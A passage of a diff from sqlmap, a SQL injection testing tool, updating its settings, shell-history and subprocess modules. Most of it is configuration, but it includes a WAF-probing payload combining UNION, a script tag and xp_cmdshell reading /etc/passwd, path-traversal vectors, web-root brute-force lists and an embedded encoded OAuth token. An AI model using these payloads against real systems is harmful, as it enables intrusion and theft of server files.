(DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES), (DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES)) + USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) +# DBMSes with upper case identifiers +UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.HSQLDB, DBMS.DERBY, DBMS.ALTIBASE, DBMS.SNOWFLAKE)) + +# Default schemas to use (when unable to enumerate) +H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC" +VERTICA_DEFAULT_SCHEMA = "public" +MCKOI_DEFAULT_SCHEMA = "APP" +CACHE_DEFAULT_SCHEMA = "SQLUser" + +# DBMSes where OFFSET mechanism starts from 1 +PLUS_ONE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.ALTIBASE, DBMS.MSSQL, DBMS.CACHE)) + +# Names that can't be used to name files on Windows OS +WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") + # Items displayed in basic help (-h) output BASIC_HELP_ITEMS = ( - "url", - "googleDork", - "data", - "cookie", - "randomAgent", - "proxy", - "testParameter", - "dbms", - "level", - "risk", - "tech", - "getAll", - "getBanner", - "getCurrentUser", - "getCurrentDb", - "getPasswordHashes", - "getTables", - "getColumns", - "getSchema", - "dumpTable", - "dumpAll", - "db", - "tbl", - "col", - "osShell", - "osPwn", - "batch", - "checkTor", - "flushSession", - "tor", - "wizard", - ) + "url", + "googleDork", + "data", + "cookie", + "randomAgent", + "proxy", + "testParameter", + "dbms", + "level", + "risk", + "technique", + "getAll", + "getBanner", + "getCurrentUser", + "getCurrentDb", + "getPasswordHashes", + "getDbs", + "getTables", + "getColumns", + "getSchema", + "dumpTable", + "dumpAll", + "db", + "tbl", + "col", + "osShell", + "osPwn", + "batch", + "checkTor", + "flushSession", + "tor", + "sqlmapShell", + "wizard", +) + +# Tags used for value replacements inside shell scripts +SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%" +SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%" # String representation for NULL value NULL = "NULL" @@ -217,34 +403,56 @@ # String representation for current database CURRENT_DB = "CD" +# String representation for current user +CURRENT_USER = "CU" + +# Name of SQLite file used for storing session data +SESSION_SQLITE_FILE = "session.sqlite" + +# Regular expressions used for finding file paths in error messages +FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"\bin (?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.~-]+)", r"\bhref=['\"]file://(?P/[^'\"]+)", r"\bin (?P[^<]+): line \d+") + # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P.+?)$", - r"
  • Error Type:
    (?P.+?)
  • ", - r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", - ) + r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P[^<]+)", + r"[^<]{0,100}(fatal|error|warning|exception)[^<]*:?\s*(?P[^<]+)", + r"(?m)^\s{0,100}(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", + r"(sql|dbc)[^>'\"]{0,32}(fatal|error|warning|exception)(
    )?:\s*(?P[^<>]+)", + r"(?P[^\n>]{0,100}SQL Syntax[^\n<]+)", + r"(?s)
  • Error Type:
    (?P.+?)
  • ", + r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", + r"Code: \d+. DB::Exception: (?P[^<>\n]*)", + r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", + r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)", + r"(?Pquery error: SELECT[^<>]+)" +) # Regular expression used for parsing charset info from meta html headers -META_CHARSET_REGEX = r'(?si).*]+charset=(?P[^">]+).*' +META_CHARSET_REGEX = r'(?si).*]+charset="?(?P[^"> ]+).*' # Regular expression used for parsing refresh info from meta html headers -META_REFRESH_REGEX = r'(?si).*]+content="?[^">]+url=(?P[^">]+).*' +META_REFRESH_REGEX = r'(?i)]+content="?[^">]+;\s*(url=)?["\']?(?P[^\'">]+)' + +# Regular expression used for parsing Javascript redirect request +JAVASCRIPT_HREF_REGEX = r'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#" + +# Vectors used for provoking specific WAF/IPS behavior(s) +WAF_ATTACK_VECTORS = ( + "", # NIL + "search=", + "file=../../../../etc/passwd", + "q=foobar", + "id=1 %s" % IPS_WAF_CHECK_PAYLOAD +) # Used for status representation in dictionary attack phase ROTATING_CHARS = ('\\', '|', '|', '/', '-') -# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory) -BIGARRAY_CHUNK_LENGTH = 4096 +# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) +BIGARRAY_CHUNK_SIZE = 32 * 1024 * 1024 + +# Compress level used for storing BigArray chunks to disk (0-9) +BIGARRAY_COMPRESS_LEVEL = 4 + +# Maximum number of socket pre-connects +SOCKET_PRE_CONNECT_QUEUE_SIZE = 3 # Only console display last n table rows TRIM_STDOUT_DUMP_SIZE = 256 +# Reference: http://stackoverflow.com/a/3168436 +# Reference: https://web.archive.org/web/20150407141500/https://support.microsoft.com/en-us/kb/899149 +DUMP_FILE_BUFFER_SIZE = 1024 + # Parse response headers only first couple of times PARSE_HEADERS_LIMIT = 3 # Step used in ORDER BY technique used for finding the right number of columns in UNION query injections ORDER_BY_STEP = 10 -# Maximum number of times for revalidation of a character in time-based injections -MAX_TIME_REVALIDATION_STEPS = 5 +# Maximum value used in ORDER BY technique used for finding the right number of columns in UNION query injections +ORDER_BY_MAX = 1000 -# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) -PARAMETER_SPLITTING_REGEX = r'[,|;]' +# Maximum number of times for revalidation of a character in inference (as required) +MAX_REVALIDATION_STEPS = 5 -# Regular expression describing possible union char value (e.g. used in --union-char) -UNION_CHAR_REGEX = r'\A\w+\Z' +# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) +PARAMETER_SPLITTING_REGEX = r"[,|;]" # Attribute used for storing original parameter value in special cases (e.g. POST) -UNENCODED_ORIGINAL_VALUE = 'original' +UNENCODED_ORIGINAL_VALUE = "original" # Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor') +COMMON_USER_COLUMNS = frozenset(("login", "user", "uname", "username", "user_name", "user_login", "account", "account_name", "auth_user", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "customer", "cuser")) # Default delimiter in GET/POST values DEFAULT_GET_POST_DELIMITER = '&' @@ -411,14 +701,32 @@ # Default delimiter in cookie values DEFAULT_COOKIE_DELIMITER = ';' -# Skip unforced HashDB flush requests below the threshold number of cached items -HASHDB_FLUSH_THRESHOLD = 32 +# Unix timestamp used for forcing cookie expiration when provided with --load-cookies +FORCE_COOKIE_EXPIRATION_TIME = "9999999999" + +# Github OAuth token used for creating an automatic Issue for unhandled exceptions +GITHUB_REPORT_OAUTH_TOKEN = "wxqc7vTeW8ohIcX+1wK55Mnql2Ex9cP+2s1dqTr/mjlZJVfLnq24fMAi08v5vRvOmuhVZQdOT/lhIRovWvIJrdECD1ud8VMPWpxY+NmjHoEx+VLK1/vCAUBwJe" + +# Flush HashDB threshold number of cached items +HASHDB_FLUSH_THRESHOLD_ITEMS = 200 + +# Flush HashDB threshold "dirty" time +HASHDB_FLUSH_THRESHOLD_TIME = 5 # Number of retries for unsuccessful HashDB flush attempts HASHDB_FLUSH_RETRIES = 3 +# Number of retries for unsuccessful HashDB retrieve attempts +HASHDB_RETRIEVE_RETRIES = 3 + +# Number of retries for unsuccessful HashDB end transaction attempts +HASHDB_END_TRANSACTION_RETRIES = 3 + # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "cAWxkLYCQT" # r5129 "".join(random.sample(string.letters, 10)) +HASHDB_MILESTONE_VALUE = "GpqxbkWTfz" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' + +# Pickle protocl used for storage of serialized data inside HashDB (https://docs.python.org/3/library/pickle.html#data-stream-format) +PICKLE_PROTOCOL = 2 # Warn user of possible delay due to large page dump in full UNION query injections LARGE_OUTPUT_THRESHOLD = 1024 ** 2 @@ -427,7 +735,10 @@ SLOW_ORDER_COUNT_THRESHOLD = 10000 # Give up on hash recognition if nothing was found in first given number of rows -HASH_RECOGNITION_QUIT_THRESHOLD = 10000 +HASH_RECOGNITION_QUIT_THRESHOLD = 1000 + +# Regular expression used for automatic hex conversion and hash cracking of (RAW) binary column values +HASH_BINARY_COLUMNS_REGEX = r"(?i)pass|psw|hash" # Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce MAX_SINGLE_URL_REDIRECTIONS = 4 @@ -435,26 +746,50 @@ # Maximum total number of redirections (regardless of URL) - before assuming we're in a loop MAX_TOTAL_REDIRECTIONS = 10 +# Maximum (deliberate) delay used in page stability check +MAX_STABILITY_DELAY = 0.5 + # Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm MAX_DNS_LABEL = 63 # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) -DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters) +DNS_BOUNDARIES_ALPHABET = re.sub(r"[a-fA-F]", "", string.ascii_letters) # Alphabet used for heuristic checks -HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.') +HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') + +# Minor artistic touch +BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER) + +# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value +DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" + +# Regular expression used for recognition of file inclusion errors +FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" + +# Length of prefix and suffix used in non-SQLI heuristic checks +NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 -# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections) -MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 +# Connection read size (processing large responses in parts to avoid MemoryError crashes - e.g. large table dump in full UNION injections) +MAX_CONNECTION_READ_SIZE = 10 * 1024 * 1024 # Maximum response total page size (trimmed if larger) MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 -# Mark used for trimming unnecessary content in large chunks -LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__" +# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) +MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 + +# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), identYwaf, htmlParser, etc.) +HEURISTIC_PAGE_SIZE_THRESHOLD = 64 * 1024 + +# Maximum (multi-threaded) length of entry in bisection algorithm +MAX_BISECTION_LENGTH = 50 * 1024 * 1024 + +# Mark used for trimming unnecessary content in large connection reads +LARGE_READ_TRIM_MARKER = "__TRIMMED_CONTENT__" # Generic SQL comment formation -GENERIC_SQL_COMMENT = "-- " +GENERIC_SQL_COMMENT = "-- [RANDSTR]" # Threshold value for turning back on time auto-adjustment mechanism VALID_TIME_CHARS_RUN_THRESHOLD = 100 @@ -462,17 +797,29 @@ # Check for empty columns only if table is sufficiently large CHECK_ZERO_COLUMNS_THRESHOLD = 10 +# Threshold for checking types of columns in case of SQLite dump format +CHECK_SQLITE_TYPE_THRESHOLD = 100 + # Boldify all logger messages containing these "patterns" -BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "heuristic test showed") +BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED", "for more than", "connection to ", "will be trimmed", "counterpart to database") + +# Regular expression used to search for bold-patterns +BOLD_PATTERNS_REGEX = '|'.join(BOLD_PATTERNS) + +# TLDs used in randomization of email-alike parameter values +RANDOMIZATION_TLDS = ("com", "net", "ru", "org", "de", "uk", "br", "jp", "cn", "fr", "it", "pl", "tv", "edu", "in", "ir", "es", "me", "info", "gr", "gov", "ca", "co", "se", "cz", "to", "vn", "nl", "cc", "az", "hu", "ua", "be", "no", "biz", "io", "ch", "ro", "sk", "eu", "us", "tw", "pt", "fi", "at", "lt", "kz", "cl", "hr", "pk", "lv", "la", "pe", "au") # Generic www root directory names -GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "wwwroot", "www") +GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "public_html", "wwwroot", "www", "site") # Maximum length of a help part containing switch/option name(s) MAX_HELP_OPTION_LENGTH = 18 +# Maximum number of connection retries (to prevent problems with recursion) +MAX_CONNECT_RETRIES = 100 + # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException") +FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", "CF_SQL_NUMERIC", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "Attribute validation error for tag", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' @@ -483,20 +830,47 @@ # Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems) LIMITED_ROWS_TEST_NUMBER = 15 +# Default adapter to use for bottle server +RESTAPI_DEFAULT_ADAPTER = "wsgiref" + +# Default REST-JSON API server listen address +RESTAPI_DEFAULT_ADDRESS = "127.0.0.1" + +# Default REST-JSON API server listen port +RESTAPI_DEFAULT_PORT = 8775 + +# Unsupported options by REST-JSON API server +RESTAPI_UNSUPPORTED_OPTIONS = ("sqlShell", "wizard") + +# Use "Supplementary Private Use Area-A" +INVALID_UNICODE_PRIVATE_AREA = False + # Format used for representing invalid unicode characters -INVALID_UNICODE_CHAR_FORMAT = r"\?%02x" +INVALID_UNICODE_CHAR_FORMAT = r"\x%02x" + +# Minimum supported version of httpx library (for --http2) +MIN_HTTPX_VERSION = "0.28" -# Regular expression for SOAP-like POST data -SOAP_RECOGNITION_REGEX = r"(?s)\A(<\?xml[^>]+>)?\s*<([^> ]+)( [^>]+)?>.+\s*\Z" +# Regular expression for XML POST data +XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z" + +# Regular expression used for detecting JSON POST data +JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null|\[).*\}\s*(\]\s*)*\Z' # Regular expression used for detecting JSON-like POST data -JSON_RECOGNITION_REGEX = r'(?s)\A\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*\Z' +JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*('[^']+'|\"[^\"]+\"|\w+)\s*:\s*('[^']+'|\"[^\"]+\"|\d+).*\}\s*(\]\s*)*\Z" # Regular expression used for detecting multipart POST data MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name=" +# Regular expression used for detecting Array-like POST data +ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\d*\]=.+%s\2\[\d*\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER) + # Default POST data content-type -DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded" +DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8" + +# Raw text POST data content-type +PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8" # Length used while checking for existence of Suhosin-patch (like) protection mechanism SUHOSIN_MAX_VALUE_LENGTH = 512 @@ -504,12 +878,60 @@ # Minimum size of an (binary) entry before it can be considered for dumping to disk MIN_BINARY_DISK_DUMP_SIZE = 100 +# Filenames of payloads xml files (in order of loading) +PAYLOAD_XML_FILES = ("boolean_blind.xml", "error_based.xml", "inline_query.xml", "stacked_queries.xml", "time_blind.xml", "union_query.xml") + # Regular expression used for extracting form tags FORM_SEARCH_REGEX = r"(?si)" +# Maximum number of lines to save in history file +MAX_HISTORY_LENGTH = 1000 + # Minimum field entry length needed for encoded content (hex, base64,...) check MIN_ENCODED_LEN_CHECK = 5 +# Timeout in seconds in which Metasploit remote session has to be initialized +METASPLOIT_SESSION_TIMEOUT = 180 + +# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html +LOBLKSIZE = 2048 + +# Prefix used to mark special variables (e.g. keywords, having special chars, etc.) +EVALCODE_ENCODED_PREFIX = "EVAL_" + +# Reference: https://en.wikipedia.org/wiki/Zip_(file_format) +ZIP_HEADER = b"\x50\x4b\x03\x04" + +# Reference: http://www.cookiecentral.com/faq/#3.5 +NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." + +# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens +CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token", "nonce") + +# Prefixes used in brute force search for web server document root +BRUTE_DOC_ROOT_PREFIXES = { + OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%", "/Library/WebServer/Documents", "/opt/homebrew/var/www"), + OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/Apache/Apache", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%") +} + +# Suffixes used in brute force search for web server document root +BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build") + +# String used for marking target name inside used brute force web server document root +BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%" + +# Character used as a boundary in kb.chars (preferably less frequent letter) +KB_CHARS_BOUNDARY_CHAR = 'q' + +# Letters of lower frequency used in kb.chars +KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp" + +# Printable bytes +PRINTABLE_BYTES = set(bytes(string.printable, "ascii") if six.PY3 else string.printable) + +# SQL keywords used for splitting in HTTP chunked transfer encoded requests (switch --chunk) +HTTP_CHUNKED_SPLIT_KEYWORDS = ("SELECT", "UPDATE", "INSERT", "FROM", "LOAD_FILE", "UNION", "information_schema", "sysdatabases", "msysaccessobjects", "msysqueries", "sysmodules") + # CSS style used in HTML dump format HTML_DUMP_CSS_STYLE = """""" + +# Leaving (dirty) possibility to change values from here (e.g. `export SQLMAP__MAX_NUMBER_OF_THREADS=20`) +for key, value in os.environ.items(): + if key.upper().startswith("%s_" % SQLMAP_ENVIRONMENT_PREFIX): + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX) + 1:].upper() + if _ in globals(): + original = globals()[_] + if isinstance(original, int): + try: + globals()[_] = int(value) + except ValueError: + pass + elif isinstance(original, bool): + globals()[_] = value.lower() in ('1', 'true') + elif isinstance(original, (list, tuple)): + globals()[_] = [__.strip() for __ in _.split(',')] + else: + globals()[_] = value diff --git a/lib/core/shell.py b/lib/core/shell.py index 458c80da611..b4ae92ab3eb 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -1,79 +1,151 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import atexit import os -import rlcompleter from lib.core import readlineng as readline -from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.data import logger from lib.core.data import paths +from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import OS +from lib.core.settings import IS_WIN +from lib.core.settings import MAX_HISTORY_LENGTH -def saveHistory(): - historyPath = os.path.expanduser(paths.SQLMAP_HISTORY) - readline.write_history_file(historyPath) +try: + import rlcompleter -def loadHistory(): - historyPath = os.path.expanduser(paths.SQLMAP_HISTORY) + class CompleterNG(rlcompleter.Completer): + def global_matches(self, text): + """ + Compute matches when text is a simple name. + Return a list of all names currently defined in self.namespace + that match. + """ + + matches = [] + n = len(text) + + for ns in (self.namespace,): + for word in ns: + if word[:n] == text: + matches.append(word) + + return matches +except: + readline._readline = None + +def readlineAvailable(): + """ + Check if the readline is available. By default + it is not in Python default installation on Windows + """ + + return readline._readline is not None + +def clearHistory(): + if not readlineAvailable(): + return + + readline.clear_history() + +def saveHistory(completion=None): + try: + if not readlineAvailable(): + return + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY + + try: + with open(historyPath, "w+"): + pass + except: + pass + + readline.set_history_length(MAX_HISTORY_LENGTH) + try: + readline.write_history_file(historyPath) + except IOError as ex: + warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, getSafeExString(ex)) + logger.warning(warnMsg) + except KeyboardInterrupt: + pass + +def loadHistory(completion=None): + if not readlineAvailable(): + return + + clearHistory() + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY if os.path.exists(historyPath): try: readline.read_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) - -class CompleterNG(rlcompleter.Completer): - def global_matches(self, text): - """ - Compute matches when text is a simple name. - Return a list of all names currently defined in self.namespace - that match. - """ - - matches = [] - n = len(text) - - for ns in (self.namespace,): - for word in ns: - if word[:n] == text: - matches.append(word) - - return matches - -def autoCompletion(sqlShell=False, osShell=False): - # First of all we check if the readline is available, by default - # it is not in Python default installation on Windows - if not readline._readline: + except IOError as ex: + warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, getSafeExString(ex)) + logger.warning(warnMsg) + except UnicodeError: + if IS_WIN: + warnMsg = "there was a problem loading the history file '%s'. " % historyPath + warnMsg += "More info can be found at 'https://github.com/pyreadline/pyreadline/issues/30'" + logger.warning(warnMsg) + +def autoCompletion(completion=None, os=None, commands=None): + if not readlineAvailable(): return - if osShell: - if Backend.isOs(OS.WINDOWS): + if completion == AUTOCOMPLETE_TYPE.OS: + if os == OS.WINDOWS: # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands completer = CompleterNG({ - "copy": None, "del": None, "dir": None, - "echo": None, "md": None, "mem": None, - "move": None, "net": None, "netstat -na": None, - "ver": None, "xcopy": None, "whoami": None, - }) + "attrib": None, "copy": None, "del": None, + "dir": None, "echo": None, "fc": None, + "label": None, "md": None, "mem": None, + "move": None, "net": None, "netstat -na": None, + "tree": None, "truename": None, "type": None, + "ver": None, "vol": None, "xcopy": None, + }) else: # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands completer = CompleterNG({ - "cp": None, "rm": None, "ls": None, - "echo": None, "mkdir": None, "free": None, - "mv": None, "ifconfig": None, "netstat -natu": None, - "pwd": None, "uname": None, "id": None, - }) + "cat": None, "chmod": None, "chown": None, + "cp": None, "cut": None, "date": None, "df": None, + "diff": None, "du": None, "echo": None, "env": None, + "file": None, "find": None, "free": None, "grep": None, + "id": None, "ifconfig": None, "ls": None, "mkdir": None, + "mv": None, "netstat": None, "pwd": None, "rm": None, + "uname": None, "whoami": None, + }) + + readline.set_completer(completer.complete) + readline.parse_and_bind("tab: complete") + elif commands: + completer = CompleterNG(dict(((_, None) for _ in commands))) + readline.set_completer_delims(' ') readline.set_completer(completer.complete) readline.parse_and_bind("tab: complete") - loadHistory() - atexit.register(saveHistory) + loadHistory(completion) + atexit.register(saveHistory, completion) diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index f2685ddfd64..97bac9bb26d 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -1,16 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import division + import errno import os import subprocess -import sys import time +from lib.core.compat import buffer +from lib.core.convert import getBytes from lib.core.settings import IS_WIN if IS_WIN: @@ -24,20 +27,15 @@ import select import fcntl - if (sys.hexversion >> 16) >= 0x202: - FCNTL = fcntl - else: - import FCNTL - def blockingReadFromFD(fd): # Quick twist around original Twisted function # Blocking read from a non-blocking file descriptor - output = "" + output = b"" while True: try: output += os.read(fd, 8192) - except (OSError, IOError), ioe: + except (OSError, IOError) as ioe: if ioe.args[0] in (errno.EAGAIN, errno.EINTR): # Uncomment the following line if the process seems to # take a huge amount of cpu time @@ -58,7 +56,7 @@ def blockingWriteToFD(fd, data): try: data_length = len(data) wrote_data = os.write(fd, data) - except (OSError, IOError), io: + except (OSError, IOError) as io: if io.errno in (errno.EAGAIN, errno.EINTR): continue else: @@ -77,7 +75,7 @@ def recv(self, maxsize=None): def recv_err(self, maxsize=None): return self._recv('stderr', maxsize) - def send_recv(self, input='', maxsize=None): + def send_recv(self, input=b'', maxsize=None): return self.send(input), self.recv(maxsize), self.recv_err(maxsize) def get_conn_maxsize(self, which, maxsize): @@ -91,18 +89,18 @@ def _close(self, which): getattr(self, which).close() setattr(self, which, None) - if subprocess.mswindows: + if IS_WIN: def send(self, input): if not self.stdin: return None try: x = msvcrt.get_osfhandle(self.stdin.fileno()) - (errCode, written) = WriteFile(x, input) - except ValueError: + (_, written) = WriteFile(x, input) + except (ValueError, NameError): return self._close('stdin') - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): + except Exception as ex: + if getattr(ex, "args", None) and ex.args[0] in (109, errno.ESHUTDOWN): return self._close('stdin') raise @@ -115,15 +113,15 @@ def _recv(self, which, maxsize): try: x = msvcrt.get_osfhandle(conn.fileno()) - (read, nAvail, nMessage) = PeekNamedPipe(x, 0) + (read, nAvail, _) = PeekNamedPipe(x, 0) if maxsize < nAvail: nAvail = maxsize if nAvail > 0: - (errCode, read) = ReadFile(x, nAvail, None) - except ValueError: + (_, read) = ReadFile(x, nAvail, None) + except (ValueError, NameError): return self._close(which) - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): + except Exception as ex: + if getattr(ex, "args", None) and ex.args[0] in (109, errno.ESHUTDOWN): return self._close(which) raise @@ -140,8 +138,8 @@ def send(self, input): try: written = os.write(self.stdin.fileno(), input) - except OSError, why: - if why[0] == errno.EPIPE: # broken pipe + except OSError as ex: + if ex.args[0] == errno.EPIPE: # broken pipe return self._close('stdin') raise @@ -189,12 +187,16 @@ def recv_some(p, 